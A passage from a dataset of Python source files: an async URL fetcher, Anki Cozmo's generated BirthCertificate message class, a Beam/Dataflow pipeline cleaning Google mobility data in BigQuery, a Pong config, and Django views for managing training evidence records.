session)\n\n async def run(urls, headers):\n # create instance of Semaphore\n # sem = asyncio.Semaphore(1000)\n tasks = []\n # Create client session that will ensure we dont open new connection\n # per each request.\n async with ClientSession(headers=headers) as session:\n for url in urls:\n # pass Semaphore and session to every GET request\n task = asyncio.ensure_future(fetch(url, session))\n tasks.append(task)\n\n responses = await asyncio.gather(*tasks)\n 
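            # Reviewer note (added comment, not in the original source): the
            # enclosing ``async with ClientSession(...)`` block already closes
            # the session when it exits, so the explicit close() that follows
            # is redundant -- harmless, but it could be dropped.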
await session.close()\n return responses\n\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n future = asyncio.ensure_future(run(urls, headers))\n results = loop.run_until_complete(future)\n loop.close()\n\n return results","sub_path":"osiris/AsyncFetcher.py","file_name":"AsyncFetcher.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"579422920","text":"# Copyright (c) 2016 Anki, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License in the file LICENSE.txt or at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nAutogenerated python message buffer code.\nSource: clad/types/birthCertificate.clad\nFull command line: ../tools/message-buffers/emitters/Python_emitter.py -C ../robot/clad/src/ -o ../generated/cladPython// clad/types/birthCertificate.clad\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\ndef _modify_path():\n import inspect, os, sys\n search_paths = [\n '../..',\n '../../../../tools/message-buffers/support/python',\n ]\n currentpath = os.path.abspath(os.path.dirname(inspect.getfile(inspect.currentframe())))\n for search_path in search_paths:\n search_path = os.path.normpath(os.path.abspath(os.path.realpath(os.path.join(currentpath, search_path))))\n if search_path not in sys.path:\n sys.path.insert(0, search_path)\n_modify_path()\n\nimport msgbuffers\n\nAnki = msgbuffers.Namespace()\nAnki.Cozmo = msgbuffers.Namespace()\n\nclass BirthCertificate(object):\n \"Generated message-passing structure.\"\n\n __slots__ = (\n '_atFactory', # uint_8\n '_whichFactory', # uint_8\n '_whichLine', # uint_8\n '_model', # uint_8\n '_year', # uint_8\n '_month', # uint_8\n '_day', # uint_8\n '_hour', # uint_8\n '_minute', # uint_8\n '_second', # uint_8\n )\n\n @property\n def atFactory(self):\n \"uint_8 atFactory struct property.\"\n return self._atFactory\n\n @atFactory.setter\n def atFactory(self, value):\n self._atFactory = msgbuffers.validate_integer(\n 'BirthCertificate.atFactory', value, 0, 255)\n\n @property\n def whichFactory(self):\n \"uint_8 whichFactory struct property.\"\n return self._whichFactory\n\n @whichFactory.setter\n def whichFactory(self, value):\n self._whichFactory = msgbuffers.validate_integer(\n 'BirthCertificate.whichFactory', value, 0, 255)\n\n @property\n def whichLine(self):\n \"uint_8 whichLine struct property.\"\n return self._whichLine\n\n @whichLine.setter\n def whichLine(self, value):\n self._whichLine = msgbuffers.validate_integer(\n 'BirthCertificate.whichLine', value, 0, 255)\n\n @property\n def model(self):\n \"uint_8 model struct property.\"\n return self._model\n\n @model.setter\n def model(self, value):\n self._model = msgbuffers.validate_integer(\n 'BirthCertificate.model', value, 0, 255)\n\n @property\n def year(self):\n \"uint_8 year struct property.\"\n return self._year\n\n @year.setter\n def year(self, value):\n self._year = msgbuffers.validate_integer(\n 'BirthCertificate.year', value, 0, 255)\n\n @property\n def month(self):\n \"uint_8 month 
struct property.\"\n return self._month\n\n @month.setter\n def month(self, value):\n self._month = msgbuffers.validate_integer(\n 'BirthCertificate.month', value, 0, 255)\n\n @property\n def day(self):\n \"uint_8 day struct property.\"\n return self._day\n\n @day.setter\n def day(self, value):\n self._day = msgbuffers.validate_integer(\n 'BirthCertificate.day', value, 0, 255)\n\n @property\n def hour(self):\n \"uint_8 hour struct property.\"\n return self._hour\n\n @hour.setter\n def hour(self, value):\n self._hour = msgbuffers.validate_integer(\n 'BirthCertificate.hour', value, 0, 255)\n\n @property\n def minute(self):\n \"uint_8 minute struct property.\"\n return self._minute\n\n @minute.setter\n def minute(self, value):\n self._minute = msgbuffers.validate_integer(\n 'BirthCertificate.minute', value, 0, 255)\n\n @property\n def second(self):\n \"uint_8 second struct property.\"\n return self._second\n\n @second.setter\n def second(self, value):\n self._second = msgbuffers.validate_integer(\n 'BirthCertificate.second', value, 0, 255)\n\n def __init__(self, atFactory=0, whichFactory=1, whichLine=1, model=1, year=0, month=0, day=0, hour=0, minute=0, second=0):\n self.atFactory = atFactory\n self.whichFactory = whichFactory\n self.whichLine = whichLine\n self.model = model\n self.year = year\n self.month = month\n self.day = day\n self.hour = hour\n self.minute = minute\n self.second = second\n\n @classmethod\n def unpack(cls, buffer):\n \"Reads a new BirthCertificate from the given buffer.\"\n reader = msgbuffers.BinaryReader(buffer)\n value = cls.unpack_from(reader)\n if reader.tell() != len(reader):\n raise msgbuffers.ReadError(\n ('BirthCertificate.unpack received a buffer of length {length}, ' +\n 'but only {position} bytes were read.').format(\n length=len(reader), position=reader.tell()))\n return value\n\n @classmethod\n def unpack_from(cls, reader):\n \"Reads a new BirthCertificate from the given BinaryReader.\"\n _atFactory = reader.read('B')\n _whichFactory = reader.read('B')\n _whichLine = reader.read('B')\n _model = reader.read('B')\n _year = reader.read('B')\n _month = reader.read('B')\n _day = reader.read('B')\n _hour = reader.read('B')\n _minute = reader.read('B')\n _second = reader.read('B')\n return cls(_atFactory, _whichFactory, _whichLine, _model, _year, _month, _day, _hour, _minute, _second)\n\n def pack(self):\n \"Writes the current BirthCertificate, returning bytes.\"\n writer = msgbuffers.BinaryWriter()\n self.pack_to(writer)\n return writer.dumps()\n\n def pack_to(self, writer):\n \"Writes the current BirthCertificate to the given BinaryWriter.\"\n writer.write(self._atFactory, 'B')\n writer.write(self._whichFactory, 'B')\n writer.write(self._whichLine, 'B')\n writer.write(self._model, 'B')\n writer.write(self._year, 'B')\n writer.write(self._month, 'B')\n writer.write(self._day, 'B')\n writer.write(self._hour, 'B')\n writer.write(self._minute, 'B')\n writer.write(self._second, 'B')\n\n def __eq__(self, other):\n if type(self) is type(other):\n return (self._atFactory == other._atFactory and\n self._whichFactory == other._whichFactory and\n self._whichLine == other._whichLine and\n self._model == other._model and\n self._year == other._year and\n self._month == other._month and\n self._day == other._day and\n self._hour == other._hour and\n self._minute == other._minute and\n self._second == other._second)\n else:\n return NotImplemented\n\n def __ne__(self, other):\n if type(self) is type(other):\n return not self.__eq__(other)\n else:\n return NotImplemented\n\n 
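    # Hypothetical usage sketch (reviewer addition, not emitted by the CLAD
    # generator; note the module re-exports the class as
    # Anki.Cozmo.BirthCertificate and deletes the bare name at the bottom).
    # All ten fields are uint_8, so pack() always yields exactly 10 bytes and
    # unpack() restores an equal struct:
    #
    #   bc = Anki.Cozmo.BirthCertificate(year=16, month=2, day=29)
    #   data = bc.pack()
    #   assert len(data) == 10 and len(bc) == 10
    #   assert Anki.Cozmo.BirthCertificate.unpack(data) == bc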
def __len__(self):\n return (msgbuffers.size(self._atFactory, 'B') +\n msgbuffers.size(self._whichFactory, 'B') +\n msgbuffers.size(self._whichLine, 'B') +\n msgbuffers.size(self._model, 'B') +\n msgbuffers.size(self._year, 'B') +\n msgbuffers.size(self._month, 'B') +\n msgbuffers.size(self._day, 'B') +\n msgbuffers.size(self._hour, 'B') +\n msgbuffers.size(self._minute, 'B') +\n msgbuffers.size(self._second, 'B'))\n\n def __str__(self):\n return '{type}(atFactory={atFactory}, whichFactory={whichFactory}, whichLine={whichLine}, model={model}, year={year}, month={month}, day={day}, hour={hour}, minute={minute}, second={second})'.format(\n type=type(self).__name__,\n atFactory=self._atFactory,\n whichFactory=self._whichFactory,\n whichLine=self._whichLine,\n model=self._model,\n year=self._year,\n month=self._month,\n day=self._day,\n hour=self._hour,\n minute=self._minute,\n second=self._second)\n\n def __repr__(self):\n return '{type}(atFactory={atFactory}, whichFactory={whichFactory}, whichLine={whichLine}, model={model}, year={year}, month={month}, day={day}, hour={hour}, minute={minute}, second={second})'.format(\n type=type(self).__name__,\n atFactory=repr(self._atFactory),\n whichFactory=repr(self._whichFactory),\n whichLine=repr(self._whichLine),\n model=repr(self._model),\n year=repr(self._year),\n month=repr(self._month),\n day=repr(self._day),\n hour=repr(self._hour),\n minute=repr(self._minute),\n second=repr(self._second))\n\nAnki.Cozmo.BirthCertificate = BirthCertificate\ndel BirthCertificate\n\n\n","sub_path":"rest_env/Lib/site-packages/cozmoclad/clad/types/birthCertificate.py","file_name":"birthCertificate.py","file_ext":"py","file_size_in_byte":8571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"395897883","text":"import os, datetime, logging\nimport apache_beam as beam\nfrom apache_beam.io import ReadFromText\nfrom apache_beam.io import WriteToText\n\nclass FormatCounty(beam.DoFn):\n def process(self, element):\n e = element # element is a dict\n \n # obtain the components of each element instance p\n country_region_code = e.get('country_region_code')\n country_region = e.get('country_region')\n sub_region_1 = e.get('sub_region_1')\n sub_region_2 = e.get('sub_region_2')\n date = e.get('date')\n retail_and_recreation_percent_change_from_baseline = e.get('retail_and_recreation_percent_change_from_baseline')\n grocery_and_pharmacy_percent_change_from_baseline = e.get('grocery_and_pharmacy_percent_change_from_baseline')\n parks_percent_change_from_baseline = e.get('parks_percent_change_from_baseline')\n transit_stations_percent_change_from_baseline = e.get('transit_stations_percent_change_from_baseline')\n workplaces_percent_change_from_baseline = e.get('workplaces_percent_change_from_baseline')\n residential_percent_change_from_baseline = e.get('residential_percent_change_from_baseline')\n #print(se) # check values of p\n\n # split sub_region2\n if sub_region_2 != None:\n if sub_region_2 != '':\n split = sub_region_2.split(' ')\n returnedString = ''\n foundCounty = False\n \n if split[-1].upper() == 'COUNTY':\n split = split[0:-1] #exclude county string\n foundCounty = True\n\n if foundCounty:\n for i in range(0,len(split)):\n if i == len(split) - 1:\n returnedString += split[i]\n else:\n returnedString += split[i] + ' '\n else:\n returnedString = sub_region_2\n else:\n returnedString = None\n else:\n returnedString = None\n # replace the county value with the modified county string (if the string had county in it)\n 
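        # (Reviewer note, not in the original file: the token loop above is a
        # hand-rolled equivalent of ' '.join(split); the join builtin would be
        # the idiomatic one-liner for rebuilding the county name without its
        # trailing "County" token.)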
e['sub_region_2'] = returnedString\n \n # return new element\n return [e] \n \ndef run():\n PROJECT_ID = 'nimble-cortex-266516'\n BUCKET = 'gs://covid_19_cs327_extracredit-dataflow'\n DIR_PATH = BUCKET + '/output/' + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + '/'\n\n # run pipeline on Dataflow \n options = {\n 'runner': 'DataflowRunner',\n 'job_name': 'formatcountry',\n 'project': PROJECT_ID,\n 'temp_location': BUCKET + '/temp',\n 'staging_location': BUCKET + '/staging',\n 'machine_type': 'n1-standard-4', # https://cloud.google.com/compute/docs/machine-types\n 'num_workers': 1\n }\n opts = beam.pipeline.PipelineOptions(flags=[], **options)\n\n p = beam.Pipeline('DataflowRunner', options=opts)\n\n sql = 'select * from covid_19_google_mobility_staging.mobility_report'\n bq_source = beam.io.BigQuerySource(query=sql, use_standard_sql=True)\n\n # format of pipeline transforms: '|' = apply, comment (what the transform does), '>>' = using, function\n query_results = p | 'Read from BigQuery' >> beam.io.Read(bq_source)\n \n # write input PCollection from sql query to log file (this was done by commenting out the ParDo, output, and writing into BQ transforms since the input.txt written was the same as output.txt)\n #query_results | 'Write input' >> WriteToText('google_input.txt')\n\n # apply ParDo to format the Coordinate transformation \n formatted_county_pcoll = query_results | 'Format County' >> beam.ParDo(FormatCounty())\n \n # write formatted District PCollection to log file\n #formatted_county_pcoll | 'Write formatted log' >> WriteToText('google_output.txt')\n\n dataset_id = 'covid_19_google_mobility_modeled'\n table_id = 'mobility_report_Beam_DF'\n schema_id = 'country_region_code:STRING,country_region:STRING,sub_region_1:STRING,sub_region_2:STRING,date:DATE,retail_and_recreation_percent_change_from_baseline:INTEGER,grocery_and_pharmacy_percent_change_from_baseline:INTEGER,parks_percent_change_from_baseline:INTEGER,transit_stations_percent_change_from_baseline:INTEGER,workplaces_percent_change_from_baseline:INTEGER,residential_percent_change_from_baseline:INTEGER'\n\n #write PCollection to new BQ table ! 
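    # (Reviewer note, not part of the original source: batch_size=int(100) in
    # the WriteToBigQuery call below wraps an int literal in int(), which is a
    # no-op; plain batch_size=100 is equivalent.)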
Problem resides here\n formatted_county_pcoll | 'Write BQ table' >> beam.io.WriteToBigQuery(dataset=dataset_id, \n table=table_id, \n schema=schema_id,\n project=PROJECT_ID,\n create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,\n write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE,\n batch_size=int(100))\n \n result = p.run()\n result.wait_until_finish() \n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()\n","sub_path":"covid_19_google_mobility_beam_dataflow.py","file_name":"covid_19_google_mobility_beam_dataflow.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"632587571","text":"scale = 8 # 1 for led screen, 6-ish for testing\r\nheight = 96*scale\r\nwidth = 80*scale \r\nscoreLimit = 3\r\n\r\n# Grove Socket Assignments\r\ngroveP1 = 0\r\ngroveP2 = 2\r\ngroveButton = 4\r\n\r\n# Change required in grove controls before enabling player control\r\ngrove_Threshold = 10\r\n\r\nmsg = \"PONG ON LED AS MADE BY AARON, DYLAN, JAKE, JONATHON AND JOSH!\"#All caps work a lot better\r\nmessageScroll = 0.1 #0.1 as default\r\ncolorBlue = 100,100,255\r\ncolorRed = 255,100,100\r\ncolorGreen = 100,255,100\r\ncolorGray = 100,100,100\r\ncolorText = 200,200,200","sub_path":"Pong/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"167352691","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.views.generic import TemplateView, CreateView, UpdateView, DeleteView\nfrom braces.views import LoginRequiredMixin, PermissionRequiredMixin\nfrom productos.models import Diplomado, Nivel, Sesion\nfrom formadores.models import Formador\nfrom evidencias.models import Evidencia\nfrom evidencias.forms import EvidenciaForm\nfrom productos.models import Entregable\nfrom evidencias.models import Red, Subsanacion\nfrom evidencias.forms import RedForm, RedRetroalimentacionForm\nfrom region.models import Region\nfrom django.shortcuts import HttpResponseRedirect\nfrom evidencias.tasks import build_red, carga_masiva_evidencias, retroalimentacion_red, build_red_producto_final\nfrom evidencias.models import CargaMasiva\nfrom evidencias.forms import CargaMasivaForm\nfrom matrices.models import Beneficiario\nfrom django.views.generic import FormView\nfrom evidencias.forms import SubsanacionEvidenciaForm\nfrom matrices.forms import BeneficiarioUpdateForm\nimport os\nfrom radicados.models import Radicado\nfrom evidencias.models import Rechazo\nfrom matrices.forms import PleBeneficiarioForm\nimport codecs\nfrom sican.settings import base as settings\nfrom django.core.files import File\nimport random\n\n# Create your views here.\n\nclass DiplomadosListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_diplomados.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n\nclass DiplomadosActividadesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/actividades/lista_diplomados.html'\n permission_required = \"permisos_sican.evidencias.codigos_evidencia.ver\"\n\n\nclass FormadoresListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_formadores.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n def 
get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['informes'] = self.request.user.has_perm('permisos_sican.evidencias.general.informes')\n return super(FormadoresListView,self).get_context_data(**kwargs)\n\n\n\nclass ActividadesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/actividades/lista_actividades.html'\n permission_required = \"permisos_sican.evidencias.codigos_evidencia.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['informes'] = self.request.user.has_perm('permisos_sican.evidencias.general.informes')\n return super(ActividadesListView,self).get_context_data(**kwargs)\n\n\n\nclass BeneficiariosEvidenciaListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/actividades/lista_beneficiarios.html'\n permission_required = \"permisos_sican.evidencias.codigos_evidencia.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_actividad'] = self.kwargs['id_evidencia']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_actividad'] = Entregable.objects.get(id = self.kwargs['id_evidencia']).nombre\n kwargs['informes'] = self.request.user.has_perm('permisos_sican.evidencias.codigos_evidencia.informes')\n return super(BeneficiariosEvidenciaListView,self).get_context_data(**kwargs)\n\n\n\nclass NivelesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_niveles.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['informes'] = self.request.user.has_perm('permisos_sican.evidencias.general.informes')\n return super(NivelesListView,self).get_context_data(**kwargs)\n\n\n\nclass SesionesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_sesiones.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n return super(SesionesListView,self).get_context_data(**kwargs)\n\n\nclass EntregablesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_entregables.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = 
self.kwargs['id_nivel']\n kwargs['id_sesion'] = self.kwargs['id_sesion']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n kwargs['nombre_sesion'] = Sesion.objects.get(id = self.kwargs['id_sesion']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n return super(EntregablesListView,self).get_context_data(**kwargs)\n\n\n\nclass SoportesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_soportes.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_sesion'] = self.kwargs['id_sesion']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n kwargs['nombre_sesion'] = Sesion.objects.get(id = self.kwargs['id_sesion']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['id_entregable'] = self.kwargs['id_entregable']\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.general.crear')\n return super(SoportesListView,self).get_context_data(**kwargs)\n\n\nclass NuevoSoporteView(LoginRequiredMixin,\n PermissionRequiredMixin,\n CreateView):\n model = Evidencia\n form_class = EvidenciaForm\n success_url = '../'\n template_name = 'evidencias/general/nuevo.html'\n permission_required = \"permisos_sican.evidencias.general.crear\"\n\n def get_initial(self):\n return {'id_formador':self.kwargs['id_formador'],'id_entregable':self.kwargs['id_entregable'],'id_usuario':self.request.user.id}\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_sesion'] = self.kwargs['id_sesion']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n kwargs['nombre_sesion'] = Sesion.objects.get(id = self.kwargs['id_sesion']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['id_entregable'] = self.kwargs['id_entregable']\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.general.crear')\n return super(NuevoSoporteView,self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n\n cargados = self.object.beneficiarios_cargados.all()\n formador = Formador.objects.get(id = self.kwargs['id_formador'])\n entregable = Entregable.objects.get(id = self.kwargs['id_entregable'])\n evidencias = Evidencia.objects.filter(formador = formador,entregable = entregable).filter(beneficiarios_cargados__id__in = cargados.values_list('id',flat=True))\n\n for evidencia in evidencias:\n for cargado in cargados:\n evidencia.beneficiarios_cargados.remove(cargado)\n\n return super(NuevoSoporteView,self).form_valid(form)\n\n\nclass UpdateSoporteView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UpdateView):\n model = 
Evidencia\n form_class = EvidenciaForm\n success_url = '../../'\n pk_url_kwarg = 'id_soporte'\n template_name = 'evidencias/general/nuevo.html'\n permission_required = \"permisos_sican.evidencias.general.editar\"\n\n def get_initial(self):\n return {'id_formador':self.kwargs['id_formador'],'id_entregable':self.kwargs['id_entregable'],'id_usuario':self.request.user.id}\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_sesion'] = self.kwargs['id_sesion']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n kwargs['nombre_sesion'] = Sesion.objects.get(id = self.kwargs['id_sesion']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['id_entregable'] = self.kwargs['id_entregable']\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.general.crear')\n return super(UpdateSoporteView,self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n\n cargados = self.object.beneficiarios_cargados.all()\n formador = Formador.objects.get(id = self.kwargs['id_formador'])\n entregable = Entregable.objects.get(id = self.kwargs['id_entregable'])\n evidencias = Evidencia.objects.filter(formador = formador,entregable = entregable).filter(beneficiarios_cargados__id__in = cargados.values_list('id',flat=True))\n\n for evidencia in evidencias:\n for cargado in cargados:\n evidencia.beneficiarios_cargados.remove(cargado)\n\n return super(UpdateSoporteView,self).form_valid(form)\n\n\nclass DeleteSoporteView(LoginRequiredMixin,\n PermissionRequiredMixin,\n DeleteView):\n model = Evidencia\n pk_url_kwarg = 'id_soporte'\n success_url = '../../'\n template_name = 'evidencias/general/eliminar.html'\n permission_required = \"permisos_sican.evidencias.general.eliminar\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_sesion'] = self.kwargs['id_sesion']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n kwargs['nombre_sesion'] = Sesion.objects.get(id = self.kwargs['id_sesion']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['id_entregable'] = self.kwargs['id_entregable']\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.general.crear')\n return super(DeleteSoporteView,self).get_context_data(**kwargs)\n\n\n\nclass EvidenciasListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/codigos/lista.html'\n permission_required = \"permisos_sican.evidencias.codigos.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['informes'] = self.request.user.has_perm('permisos_sican.evidencias.codigos.informes')\n return super(EvidenciasListView,self).get_context_data(**kwargs)\n\n\nclass RedsListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/red/lista.html'\n permission_required = \"permisos_sican.evidencias.red.ver\"\n\n def get_context_data(self, 
**kwargs):\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.red.crear')\n return super(RedsListView,self).get_context_data(**kwargs)\n\n\nclass NuevoRedView(LoginRequiredMixin,\n PermissionRequiredMixin,\n CreateView):\n model = Red\n form_class = RedForm\n success_url = '../'\n template_name = 'evidencias/red/nuevo.html'\n permission_required = \"permisos_sican.evidencias.red.crear\"\n\n def get_context_data(self, **kwargs):\n\n evidencias = Evidencia.objects.filter(red_id = None)\n\n region_1 = Region.objects.get(numero = 1)\n region_2 = Region.objects.get(numero = 2)\n\n evidencias_r1 = evidencias.filter(formador__region = region_1)\n evidencias_r2 = evidencias.filter(formador__region = region_2)\n\n evidencias_r1_innovatic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'INNOVATIC')\n evidencias_r1_tecnotic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'TECNOTIC')\n evidencias_r1_directic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'DIRECTIC')\n evidencias_r1_escuelatic = evidencias_r1.filter(entregable__sesion__nivel__diplomado__nombre = 'ESCUELA TIC FAMILIA')\n\n evidencias_r2_innovatic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'INNOVATIC')\n evidencias_r2_tecnotic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'TECNOTIC')\n evidencias_r2_directic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'DIRECTIC')\n evidencias_r2_escuelatic = evidencias_r2.filter(entregable__sesion__nivel__diplomado__nombre = 'ESCUELA TIC FAMILIA')\n\n ple_r1 = Beneficiario.objects.filter(region__id=1,estado_producto_final='cargado')\n ple_r2 = Beneficiario.objects.filter(region__id=2, estado_producto_final='cargado')\n\n\n kwargs['formadores_innovatic_r1'] = evidencias_r1_innovatic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_innovatic_r1'] = evidencias_r1_innovatic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_innovatic_r1'] = evidencias_r1_innovatic.count()\n\n kwargs['formadores_tecnotic_r1'] = evidencias_r1_tecnotic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_tecnotic_r1'] = evidencias_r1_tecnotic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_tecnotic_r1'] = evidencias_r1_tecnotic.count()\n\n kwargs['formadores_directic_r1'] = evidencias_r1_directic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_directic_r1'] = evidencias_r1_directic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_directic_r1'] = evidencias_r1_directic.count()\n\n kwargs['formadores_escuelatic_r1'] = evidencias_r1_escuelatic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_escuelatic_r1'] = evidencias_r1_escuelatic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_escuelatic_r1'] = evidencias_r1_escuelatic.count()\n\n kwargs['formadores_innovatic_r2'] = evidencias_r2_innovatic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_innovatic_r2'] = evidencias_r2_innovatic.values_list('beneficiarios_cargados',flat=True).distinct().count()\n kwargs['evidencias_innovatic_r2'] = evidencias_r2_innovatic.count()\n\n kwargs['formadores_tecnotic_r2'] = evidencias_r2_tecnotic.values_list('formador',flat=True).distinct().count()\n kwargs['beneficiarios_tecnotic_r2'] = 
